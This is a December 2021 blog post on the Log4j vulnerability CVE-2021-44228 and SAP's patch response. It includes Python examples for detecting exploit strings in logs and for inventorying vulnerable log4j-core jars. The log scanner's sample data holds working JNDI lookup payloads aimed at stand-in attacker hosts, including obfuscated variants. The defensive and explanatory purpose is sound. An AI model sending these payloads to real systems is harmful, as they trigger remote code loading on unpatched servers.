Wednesday, December 15, 2021

Security vulnerability Apache Log4j

On December 10th, information about a security vulnerability in the Apache Log4j software surfaced on the internet. Apache Log4j is an open-source logging library written in Java and is used by a large number of Java-based software packages. The issue in brief: an attacker who can control log messages or log message parameters can execute arbitrary code when message lookup substitution is enabled. A logged string such as ${jndi:ldap://attacker-host/x} is resolved through a JNDI lookup, which makes the application contact the attacker's server and can load attacker-supplied code into the JVM. The issue affects Log4j 2.x (2.0-beta9 up to and including 2.14.1); Log4j 1.x does not contain this message lookup and is not affected by this particular CVE. The initial fix shipped in Log4j 2.15.0; the subsequent 2.16.0 and 2.17.x releases disabled JNDI access by default and removed message lookup substitution altogether, so the latest 2.x release is the version to target. The vulnerability received the CVE (Common Vulnerabilities and Exposures) identifier CVE-2021-44228 and a CVSS score of 10, the most critical rating.
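To make the mechanism concrete, the following is an added example (not from the original post, and not SAP or Log4j project code) that scans web-server log lines for the lookup strings that trigger this bug. It normalises the common obfuscations seen during the first days of exploitation (percent-encoding, ${lower:j}/${upper:j} wrappers and the ${...:-x} default-value form) before matching, and extracts the JNDI scheme and target so a responder can see where the application would have called out to. The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real system). Lines 2-4 carry
# lookup strings of the kind that triggered CVE-2021-44228: plain, nested/obfuscated
# and percent-encoded. Line 5 contains a "${...}" that is not a JNDI lookup at all.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /?q=${${lower:j}ndi:${::-r}mi://203.0.113.7:1099/b} HTTP/1.1" 404 0',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fcanary.example.test%7D HTTP/1.1" 404 0',
    '10.0.0.3 - - [10/Dec/2021:14:02:15 +0000] "GET /price?item=${price} HTTP/1.1" 200 88',
]

# ${lower:x} / ${upper:x} and the default-value form ${anything:-x} all evaluate to x
# inside Log4j, which is how attackers hid the literal "jndi" from naive string matches.
CASE_RE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*)\}", re.IGNORECASE)
DEFAULT_RE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation: ${jndi:<scheme>:<target>} with optional "//" after the scheme.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^}\s]*)", re.IGNORECASE)


def normalize(text, rounds=10):
    """Undo percent-encoding and inner lookups until the string stops changing
    (bounded by `rounds` so pathological input cannot loop forever)."""
    for _ in range(rounds):
        new = unquote(text)
        new = CASE_RE.sub(lambda m: m.group(1), new)
        new = DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def jndi_targets(line):
    """Return [(scheme, target), ...] for every JNDI lookup found after normalisation."""
    return [(scheme.lower(), target) for scheme, target in JNDI_RE.findall(normalize(line))]


def scan(lines):
    """Report line number and lookup targets for each line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        targets = jndi_targets(line)
        if targets:
            hits.append({"line": number, "targets": targets})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"line {hit['line']}: {hit['targets']}")
```

The normalisation covers the obfuscations that were common in scanning traffic, but it is not a full Log4j lookup evaluator; treat a hit as a confirmed probe and a miss as "nothing obvious", not as proof that no attempt was made. Any LDAP, RMI or DNS target it extracts is a candidate for blocking and for correlation with outbound connection logs from the affected host.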

SAP, like many other software vendors around the world, is following up on this issue. An assessment of whether and how Log4j is used within each product is under way. Where a product is affected, the vendor releases a patch to fix it. At the time of writing, SAP has published a statement listing which software is affected, not affected, or not yet assessed. The relevant SAP Notes are listed in that statement so customers can follow up and implement the patches.

From the SAP Analytics perspective, there are SAP solutions that use the Log4j library. SAP customers should therefore monitor this topic closely (see the links below) and patch promptly if they run any software that is identified as affected. While waiting for a vendor note, customers can also inventory their own installations for bundled copies of the log4j-core jar, since the library is often shipped inside application archives rather than installed separately.
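One way to run such an inventory, as an added example that is neither SAP's nor the Log4j project's code: it walks jar/war/ear archives recursively, reads the Maven pom.properties that log4j-core ships to obtain the version, and checks whether JndiLookup.class is still present (deleting that class from the jar was the widely used interim mitigation before patched builds were available). The archives below are constructed in memory so the example runs offline; for a real check, read the bytes of the files found under your installation directory and pass them to inspect_archive. The classification assumes every 2.x release below 2.15.0 is vulnerable, which is a slight over-approximation for the earliest 2.0 betas.

```python
import io
import re
import zipfile

# Paths inside a log4j-core jar that identify the library and the vulnerable lookup class.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED = (".jar", ".war", ".ear", ".zip")
FIXED = (2, 15, 0)  # first release that closed CVE-2021-44228 (later releases went further)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); pre-releases like '2.0-beta9' -> (2, 0, 0)."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(n or 0) for n in match.groups()) if match else None


def assess(version, has_jndi_lookup):
    """Classify one log4j-core copy (assumption: all 2.x below 2.15.0 are vulnerable)."""
    if version is None:
        return "unknown"
    if version[0] != 2:
        return "not-log4j2"
    if not has_jndi_lookup:
        return "mitigated-jndilookup-removed"
    return "vulnerable" if version < FIXED else "patched"


def inspect_archive(data, path, findings=None):
    """Walk a jar/war/ear given as bytes, recursing into nested archives,
    and record every log4j-core copy found with its version and status."""
    findings = [] if findings is None else findings
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = dict(
                line.split("=", 1)
                for line in zf.read(POM_PROPS).decode().splitlines()
                if "=" in line and not line.startswith("#")
            )
            version_text = props.get("version", "")
            findings.append({
                "path": path,
                "version": version_text,
                "status": assess(parse_version(version_text), JNDI_LOOKUP in names),
            })
        for name in sorted(names):
            if name.lower().endswith(NESTED):
                inspect_archive(zf.read(name), f"{path}!/{name}", findings)
    return findings


# --- constructed test archives (mimic log4j-core metadata; not real SAP or Log4j artefacts) ---
def make_jar(version, with_jndi_lookup=True):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"#generated\nversion={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def make_war(libs):
    """Wrap {entry-name: jar-bytes} into a web archive, as deployed applications do."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in libs.items():
            zf.writestr(name, data)
    return buf.getvalue()


SAMPLES = {
    "app-old.war": make_war({"WEB-INF/lib/log4j-core-2.14.1.jar": make_jar("2.14.1")}),
    "app-stripped.war": make_war({"WEB-INF/lib/log4j-core-2.14.1.jar": make_jar("2.14.1", with_jndi_lookup=False)}),
    "log4j-core-2.17.1.jar": make_jar("2.17.1"),
}


def scan_all(samples):
    return {path: inspect_archive(data, path) for path, data in samples.items()}


if __name__ == "__main__":
    for path, findings in scan_all(SAMPLES).items():
        for f in findings:
            print(f"{f['path']}: log4j-core {f['version']} -> {f['status']}")
```

A "patched" result only says the copy is at or above the first fixed release; with the later hardening releases available, the practical target is the newest 2.x, and the vendor's own note decides which build is supported for a given product. Shaded or renamed copies of the library (where the Maven metadata has been stripped) will not be found by this check, so an empty result is not a guarantee.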


More information:

SAP’s Response to CVE-2021-44228 Apache Log4j 2

Search the SAP Community for log4j

3129956 - CVE-2021-44228 - BusinessObjects impact for Log4j vulnerability

3130994 - CVE-2021-44228 - SAP Predictive Analytics impact for Log4j vulnerability

Knowledge Base Search - SAP ONE Support Launchpad

CISA
